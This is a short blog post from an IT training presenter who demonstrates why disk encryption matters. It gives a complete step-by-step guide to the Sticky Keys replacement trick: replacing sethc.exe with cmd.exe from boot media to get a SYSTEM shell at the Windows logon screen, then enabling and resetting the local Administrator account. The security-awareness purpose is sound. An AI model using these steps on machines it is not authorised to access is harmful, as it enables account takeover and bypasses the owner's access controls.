Today I was presenting at Microsoft IT Camp, and an question about why BitLocker should always be implemented came up. So I showed this simple demo on how Windows (and other operating systems) can be hacked, if the disk is left unencrypted.
The demo was showed on the latest version of Windows 8.1 Update with all updates installed.
Some of the students asked for en guide, so they could show the demo where they work, so here it is…
- Login using a standard user account
- Show that the Local Administrator Account is disabled
- Restart the computer, and boot from a standard Windows DVD
- 4. When prompted for language settings, press Shift + F10 to launch the Command Prompt.
- 5. Type D:
- 6. Navigate to D:\windows\system32
- 7. Type copy cmd.exe sethc.exe, and press Y to accept.
- 8. Restart the computer (boot from harddisk)
- 9. When the logon windows appers, pres shift 5 times, and the command prompt will open.
- 10. Type whoami to see that you know have system rigths
- 11. Type net user administrator /active:yes, to activate the local administrator account
- 12. Type net user administrator *, to provide a new password to the local administrator.
- 13. Restart the computer and logon using .\administrator
Enjoy.
